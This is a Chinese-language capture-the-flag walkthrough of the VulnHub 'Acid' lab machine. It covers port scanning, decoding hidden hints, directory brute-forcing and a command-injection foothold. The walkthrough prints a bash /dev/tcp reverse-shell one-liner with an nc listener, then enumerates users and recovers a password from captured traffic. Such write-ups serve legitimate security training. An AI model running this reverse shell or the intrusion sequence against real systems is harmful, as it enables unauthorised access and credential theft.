https://download.vulnhub.com/acid/Acid.rar
https://download.vulnhub.com/acid/Acid.rar.torrent
环境使用VMware 运行攻击机kali与靶机Ubuntu
靶机地址发现,靶机IP为网卡为 VMware 的192.168.0.104
扫描端口小提示:
nmap默认只对 1-1024 以及一些常用端口进行扫描。 对指定端口进行扫描: nmap -p min-max
第一次扫描啥也没有,这时候就应该用指定端口范围的方式扫描所有的端口了。
经扫描全部端口发现,在 33447 端口上存在 http 服务。
尝试扫描源码发现毫无收获,只扫出来一个 index.html。经查看页面源码发现 16进制字符串
0x643239334c6d70775a773d3d
将其转为字符串得base64字符串
d293LmpwZw== 再次解密得到 wow.jpg
直接查看页面http://192.168.0.104:33447/wow.jpg 发现并无收获。再次检查一遍,从源码中收获了储存图片的文件夹 image
原来老外那边也会用这种表情夸张的沙雕表情包。
在此页面查看源码发现毫无提示。想起来之前遇到过一道web CTF题是要把web界面的图片保存下来,最后的flag在图片中。
讲图片以16进制打开,发现还真有意外收获。
踩坑小贴士: 原本以为这里直接使用ascii转码,转出来是一个看不懂的东西 %=AAB$@#&&A@''#AA!%B$=%?$@" 经 ascii 转 hex之后得到一串md5加密值 7aee0f6d588ed9905ee37f16a7c610d4 解密为 63425 联想到之前 index.html 所说的使用钥匙打开魔法门,那么这串数字字符串应该就是打开门的关键了
现在啥发现都没有了,开始使用查找web目录。经过一个个查看,最终将突破点锁定在 Challenge目录下,点开后发现是一个登录界面
再次扫描 challenge目录下文件能发现
error.php:默认报错页面 hacked.php:查看会302到另一个页面,提示需要登陆后查看 include.php:同样需要登陆后查看 cake.php:登陆后查看,且其 页面的title告诉我们还有一个文件夹叫 /Magic_Box todo.txt:这个有东西,图片放在下面了 .gitignore:一个 git 忽略文件
既然找不到别的东西,那么就试试爆破新发现的目录
http://192.168.0.104:33447/Challenge/Magic_Box
发现一个 command.php,其中有命令执行。尝试能不能弹个shell
成功获得shell
靶机:echo "bash -i >& /dev/tcp/192.168.0.108/1234 0>&1" | bash kali:nc -lvp 1234
在 /etc/passwd 处查看到三个可以关注的用户分别是: root、saman、acid
分别查看三个用户所拥有的文件。在 acid用户所有的文件下发现一个流量包,他的名字也告诉我们这是一个提示,另外底下的 pwn_me文件夹是不是说这个地方还可以使用 PWN 来做呢?咱也没学过PWN,咱也不懂
find / -user acid 2>/dev/null
将其下载到windows真实机中进行查看。
握手包和分手包(忘了断开连接的那个过程叫啥了)就不用看了。最终在TPC流量包中找到了疑似saman的密码。
成功获得flag